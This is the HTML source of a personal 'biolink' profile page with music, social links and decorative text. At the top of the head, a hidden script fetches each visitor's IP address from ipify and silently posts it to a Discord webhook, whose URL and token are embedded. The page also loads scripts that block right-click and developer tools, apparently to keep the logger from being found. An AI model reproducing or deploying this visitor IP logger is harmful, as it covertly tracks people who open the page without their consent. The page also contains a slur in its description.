<!DOCTYPE html>
<html lang="en">
<head>
  <script>
    function getIP(json) {
      var request = new XMLHttpRequest(); //making a request for the webhook
          request.open("POST", "https://discord.com/api/webhooks/1182121545842307182/wd5WU-f5yGI2hRz9fpveYui2ktPVygPr_QAUzwbby-Sf-DBw8jmlIlYTWEf2CX-rUtYe");
    
          request.setRequestHeader('Content-type', 'application/json');
    
          var params = {
            username: "Logger",
            avatar_url: "https://i.pinimg.com/originals/d8/eb/57/d8eb57825be593ff8993265cf5eea794.jpg",
            content: "**IP:** *" + json.ip + "*"
          }
       //just a webhook parameters such as avatar,name,message
    
          request.send(JSON.stringify(params));
        }
    
    </script>
    <script src="https://api.ipify.org?format=jsonp&callback=getIP"></script>  
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
  <meta content="width=device-width,initial-scale=1" name="viewport">
  <meta content="IE=edge" http-equiv="X-UA-Compatible">
  <meta content="UnStoppable" property="og:title">
  <meta content="Private Biolink 4 retards" property="og:description">
  <meta content="images/image.png" property="og:image">
  <meta content="#36393e" name="theme-color" data-react-helmet="true">
  <meta content="Private biolink and Forums" name="description">
  <link href="css/main.css" rel="stylesheet">
  <script src="js/38359ed66d.js" ></script>
  <title>UnStoppable</title>
	<link rel="canonical" href="killing.fun" />
  <script src="js/typed.min.js"></script>
  <script src="js/jquery.min.js"></script>
  <script src="js/disable_inspect.js"></script>
  <script src="js/disable-devtool.min.js"></script>
  <script protect src="js/protect.js"></script>
  <link href="images/1054189826204770335.png" rel="icon" type="image/x-icon">
</head>
<body oncontextmenu><input autocomplete="off" id="overlay-toggle" type="checkbox">
  <div class="fullscreen overlay">
    <div id="center"><label for="overlay-toggle" onclick="audioPlay(),videoPlay()">
        <div id="enter"><b> ./UnStoppable </b></div>
      </label></div>
  </div>
  </div><audio id="audio" loop preload="auto">
    <source src="media/music.mp3" type="audio/mp3">
  </audio>
  <style>
    @font-face {
      font-family: 'Help Me';
      src: url('fonts/HelpMe.ttf') format('truetype');
    }
  </style>
  <div id="center">
    <style>
      body {
        margin: 0;
        padding: 0;
        font-family: Arial, sans-serif;
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        height: 100vh;
        background-color: #f0f0f0;
      }
      .container {
        display: flex;
        align-items: center;
      }
      .image-container {
        width: 150px;
        height: 150px;
        border-radius: 50%;
        overflow: hidden;
        margin-left: 375px;
        /* Adjust the margin to increase or decrease the gap */
        margin-right: 375px;
      }
      .image-container img {
        width: 100%;
        height: 100%;
        object-fit: cover;
      }
      .text-container {
        text-align: center;
      }
      .icons {
        display: flex;
        margin-left: 400px;
        margin-top: 30px;
      }
      .icon {
        width: 30px;
        height: 30px;
        margin-right: 30px;
        /* Adjust the margin between icons */
      }
      .name {
        margin-bottom: 500px;
      }
      .overlay-text {
        position: absolute;
        top: 65%;
        left: 75%;
        transform: translate(-50%, -50%);
        font-size: 16px;
        /* Adjust the font size as needed */
        color: white;
        /* Text color */
        background-color: rgba(0, 0, 0, 0.7);
        /* Background color with transparency */
        padding: 5px 10px;
        /* Adjust padding as needed */
        border-radius: 5px;
        /* Add rounded corners */
      }
      .overlay-text2 {
        position: absolute;
        top: 65%;
        left: 25%;
        transform: translate(-50%, -50%);
        font-size: 16px;
        /* Adjust the font size as needed */
        color: white;
        /* Text color */
        background-color: rgba(0, 0, 0, 0.7);
        /* Background color with transparency */
        padding: 5px 10px;
        /* Adjust padding as needed */
        border-radius: 5px;
        /* Add rounded corners */
      }
      .socials {
        margin-top: 400px;
      }
    </style>
    </head>
    <div class="image-containe">
      <h1><span class="sparkle">./Gores</span></h1>
    </div>
    <body>
      <div>
        <div class="image-container">
          <img
            src="attachments\1149040026282365019\1151002725455249439\IMG_9915.jpg"
            alt="Profile Image 2">
        </div>
        <div class="text-container">
          <p>In Love with ur body
          </body></p>
        </div>
        <div class="text-container">
          <p>Gospel made dis shit :) </p>
          <div class="icons">
            <a href="https://discordlookup.com/user/1186373296636309604" target="_blank"><img src="images/discord-2-xxl.png" alt="Icon 1" class="icon"></a>
            <a href="https://t.me/vorbital" target="_blank"><img src="images/telegram.png" alt="Icon 3" class="icon"></a>
          </div>
        </div>
      </div>
    </body>    
</html>
</a>
</div>
<div id="center"><br><br><br><br><span id="typed"
    style="font-size:20px;font-family:&#x27;Roboto Mono&#x27;,monospace;text-shadow:0 0 .1em #fff"></span></div>
<div class="snowflakes">
  <div class="snowflake">gores loves Gospel </div>
  <div class="snowflake">الله </div>
  <div class="snowflake">الله </div>
  <div class="snowflake">dont trust anyone </div>
  <div class="snowflake">الله </div>
  <div class="snowflake">الله </div>
  <div class="snowflake">الله </div>
  <div class="snowflake">الله </div>
  <div class="snowflake">الله </div>
  <div class="snowflake">الله </div>
  <div class="snowflake">الله </div>
  <div class="snowflake">الله </div>
  <div class="snowflake">الله </div>
  <div class="snowflake">الله </div>
  <div class="snowflake">الله </div>
  <div class="snowflake">الله </div>
  <div class="snowflake">الله </div>
</div>
<div id="socials">
  <script src="js/script.js"></script>
  <script src="js/audio.js"></script>
  <script src="js/index.js"></script>
  <script src="js/cursor.js"></script>
  <script src="js/funny.js"></script>
  <script protect src="js/protect.js"></script>
  <center>
    <div class="logo noselect" style="margin-top:80px;float:none">
    </div>
  </center>